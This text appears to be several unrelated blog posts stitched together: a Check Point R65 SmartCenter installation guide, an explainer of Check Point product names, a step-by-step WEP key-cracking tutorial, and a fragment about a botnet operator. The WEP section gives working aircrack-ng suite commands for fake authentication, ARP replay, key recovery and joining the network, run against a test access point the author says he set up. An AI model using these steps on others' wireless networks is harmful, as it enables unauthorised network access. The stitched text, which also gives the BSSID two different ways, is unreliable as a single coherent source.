The install is fairly straightforward, just mount/insert the disc and run the setup. I’ll run through a sample of an R65 SmartCenter install as some of the screens need a little explanation.

Skip past the first two screens until you hit this page:

If you are installing the full firewall product, what you choose here will depend on your licensing. As we are just installing the SmartCenter it doesn’t matter for us. On the next page you can import a config if you have one, or choose a fresh install. After that you come to this page:

This is where you choose the products you want to install. Here I’ve chosen the SmartCenter itself, plus the SmartConsole management tools. If you wanted to install the firewall software, you would choose the top box. On the next page you can choose if this will be a primary, secondary, or log server. You can install two SmartCenter servers in an HA cluster using the primary/secondary options. At this point the installer will run and complete. There are a few more steps before we can use it though.

Firstly it will ask you to install any licenses that you might have. The products come with a 15 day evaluation license if you are just playing around. If you have any license files you can either upload the files directly, or type in the keys manually.

The next step is to create an admin user, which is followed by defining IP ranges which are allowed to access the management software on the server. The default is that any user can manage the server. Although I’ve selected to install the management tools locally on the server, you can also install them separately on another machine, in a similar way to a Microsoft MMC or the Cisco ASDM. Finally you’ll be given a signature key, which is used to verify the identity of the server once we start linking it up to remote firewalls.

At this point your SmartCenter server is up and running, its a fairly painless install. You can have a play with the management tools (they have a nice demo mode with predefined topologies), but until we link up our first firewall the server alone is pretty useless.

With any new product there is always a little confusion, but with Check Point this seems to have been taken to a whole other level and I’ve had a great deal of difficulty working out what it is that they sell, what it actually does and how it all fits together. Check Point appear to have gone through a great deal re-branding, and with a lot of older versions still supported everything now has more than one name depending on which version of the software you are talking about. I’ll try and simplify it here as I understand things. The main thing to remember with Check Point is that, to a much greater extent than with other products, you are looking at two very different and separate things with regards to the hardware and the software.

Hardware

The hardware you choose for your firewalls will determine how fast and big it can go, as you might expect. It also determines which software features you can use on that particular bit of tin (which I’ll talk about shortly). Check Point give you a large number of options for your hardware depending on your needs.

• IP appliances – the appliance formerly known as Nokia. These are the mid to high end firewalls and range from 1Gb to 30Gb of throughput (with the right model and expansion cards). For your money you get a piece of tin with various ports and space for extra modules. This is very much a pure networking appliance with support for all the basics such as VPN, plus support for advanced features like IPS, routing protocols, clustering, QoS and VoIP.
• Power-1 appliances – these are more datacenter oriented, and run from 9Gb up to 30Gb throughput and are again a piece of tin. They support a few more edge defence features than the IP appliances such as URL filtering, antivirus, antispam, antimalware. Apart from this though they look very similar performance-wise to the high-end IP appliances.
• UTM-1 appliances – I see these as the low end version of the Power-1, tin again. Performance is from 1.5Gb to 4.5Gb, but you can get all the features of the Power-1 plus a few extra ones like built in management and monitoring.
• “Open server” – also known as SPLAT (Secure PLATform). This is kind of like Bring Your own Box, you install the Check Point into a standard bit of server hardware. The license determines things like how many cores your server can have and what features you are allowed, but after that the performance is down to your hardware. SPLAT itself is a modified version of Linux into which various Check Point software modules can be installed.

There are a few other variations including a virtualised version, but these are the main ones. For my testing I’ll be using a SPLAT system running in VMware.

Software

Check Point has gone through a lot of different versions of their software. The good news is that every device runs a version of the same software, and is managed through the same tools. Configuring rules on a SPLAT is exactly the same as configuring rules on one of the appliances. The bad news is that due to the number of iterations and the different licensing for them, you can be left scratching your head.

The first bit of confusion is that way back in 1994 when Check Point made their first firewall they decided to name it Firewall-1, and quickly followed with a VPN product called VPN-1. If you fast forward to today you’ll still find references to Firewall-1, VPN-1, and a whole raft of other things called xxx-1. The 1 has nothing to do with the version of the software as you might imagine, its simply the name of the product. It makes more sense if you think of these as identifiers of feature sets.

The way you differentiate between older and newer software is via the version number of the software. Wikipedia has the full details, but the numbering is roughly:

Anything prior to NGX R65 is end of life, NGX R65 itself is nearing end of life, and R75 has just been released. Lots of people are currently in the process of upgrading from NGX R65, and if you have existing licenses Check Point are currently running an upgrade promotion.

If you are looking at NGX products and earlier, you combine a feature set and a version number to label your software. Eg, a VPN-1 UTM NGX R65 has a defined set of features from the VPN-1 UTM label, and is the NGX R65 software version of those features.

With R71 and later Check Point have adopted a software blade architecture. You still have a software version, but the features which you run inside of that are a lot more mix and match and are deployed as virtual blades (providing your hardware supports it).

In Conclusion

With all the different product names and the mix of people on different versions currently, Check Point is very confusing to the newcomer. Over the next few posts I’m going to go through some basic installation and configuration, starting with an NGX R65 set up. Depending on how things go I may throw in some more advanced stuff like the failover clustering and and upgrade to R71.

I’ll be using a standard laptop running BackTrack 4 R1, with an Alfa USB wireless adaptor (AWUS036H). Using a well-tested adaptor such as this will solve a lot of headaches as it is literally plug and play.

I’ll split this into four steps: finding the target; performing the attack; cracking the key; and connecting to the network. For the purposes of this I’ve set up an access point running 64 bit WEP so the capturing goes a little faster. I’m going to skim over a lot of the theory since this is available elsewhere in much better detail than I’ll be able to go into.

Finding a target

This bit is pretty easy. Boot your BackTrack live cd, type ‘startx’ to get into the GUI and then open a shell window. The tool we’ll use to scope out available APs is called Kismet. Before we run this we need to identify our wireless interface but running iwconfig. In my case the interface is called ‘wlan0′.

Then we start Kismet. It has a server and client component, which you can run separately. If you run just the client and the server isn’t running, it will prompt you to start it anyway. I’ll use the option of running the server separately:

kismet_server

Then in a new shell run the client:

kismet

The client will warn you that you are running as root, and then ask you to choose a capture interface since none is defined. This is the interface you found from iwconfig, type in its name exactly as it was written. If you get an error you might be using the wrong interface, so keep trying wireless adaptors until you find the one that works. Once Kismet is running we can see a list of the available wireless neworks plus a ton of information. There is a lot of stuff to explore, but the info we are concerned with is the bssid, the essid and the channel it is on. Below we can see my test network as seen by Kismet. Feel free to try the other menus and options to get a handle for the tool.

From this then we can see the info we need to make a note of:

• essid: test
• bssid: 00:14:6C:6E:B4:7C
• channel: 11

Performing the attack

To crack WEP we need to capture a special kind of packet, known as an Initialisation Vector. Once we have enough of these we can attempt to crack the key. If you just set off something to monitor you’ll find that these naturally occur, but to get the amount required for cracking we can do a few tricks to speed up the process. We are going to send packets to the AP which will cause it to send out IVs at a much faster rate than normal. I’ll also show you how to fake an association with the AP from the laptop – usually you can use already connected clients to perform the attack but if there aren’t any this is a handy trick.

If at any point during this part things don’t work or you get errors, I’ve found the best way is to just reset the wireless adapter by disconnecting/reconnecting it.

First close Kismet so it doesn’t interfere, and run the following command in a shell window to start the IV capture:

airodump-ng --channel 11 --bssid 00:14:6C:6E:B4:7C --write /testcap --ivs wlan0

–channel 11 means capture on channel 11
–bssid 00:14:6C:6E:B4:7C means capture traffic from the given bssid
--write /testcap is where we want the output saving
–ivs means only capture packets containing IVs
wlan0 is the interface to capture on

You’ll get a screen with some stats, but assuming there are no clients connected it won’t show much traffic yet. Now we are going to set off an association attack against the AP in another shell window. This will cause our laptop to associate with the AP so we can use it to generate IVs:

aireplay-ng -1 0 -e test -a 00:14:6C:6E:B4:7C -h 00:C0:CA:11:22:33 wlan0

--1 0 use attack 1 (fake auth) with 0 delay, or only associate once
-e test is the target essid of the fake auth
-a 00:14:6C:BE:B4:7C is the target bssid
-h 00:C0:CA:11:22:33 is the mac address of the wireless card (got via ifconfig, need to run ifup wlan0 if it doesn’t show up)
wlan0 is once again the source interface

So now we are capturing traffic and have a client to use for the attack. The next command is:

aireplay-ng -3 -b 00:14:6C:6E:B4:7C -h 00:C0:CA:11:22:33 wlan0

--3 use attack 3 (ARP replay)
-b 00:14:6C:BE:B4:7C is the target bssid
-h 00:C0:CA:11:22:33 is the mac address of the wireless card
wlan0 is once again the source interface

Eventually you should see some ARP replies (it may take a while to start). Now if you look in the airodump window, we are watching for the column labelled #Data. This is the number of packets we’ve captured, which all happen to be IVs due to our airodump filters. The amount you need to perform a crack may vary. I find the best approach is to try to crack every 50,000, which leads us onto the next part.

Cracking the key

Really easy this bit, just run the following command:

aircrack-ng -s /testcap-01.ivs

If it takes more that a couple of seconds, wait until you have more IVs. Now we have all the info we need to connect to the network

Connecting to the network

Nothing surprising here, just using the info we already have to get on the network.

ifdown wlan0
iwconfig wlan0 mode managed
iwconfig wlan0 channel 11
iwconfig wlan0 essid test
iwconfig wlan0 key 1b9dda483d
ifup wlan0

At this point you should get an IP via DHCP, if not try running “dhcpd wlan0“. If you do this a few times you can get pretty fast at it, and 5-10 minutes will be all you’ll need to perform the full attack.

One of the most interesting parts for me was psyche of the guy that was behind it – they clearly knew that what they were doing was wrong and that they could get into a lot of trouble for it, but this didn’t override their urge to show off. Even when the Cisco researcher confessed that he’d been decieving them the whole time, they happily went along with his next deception and started giving out even more detailed information.

Another bit that really struck me was the amount of paranoia this individual seemed to have to live with, not only due to law enforcement potentially being after him but because of the possibility of his peers stealing his botnet while he slept.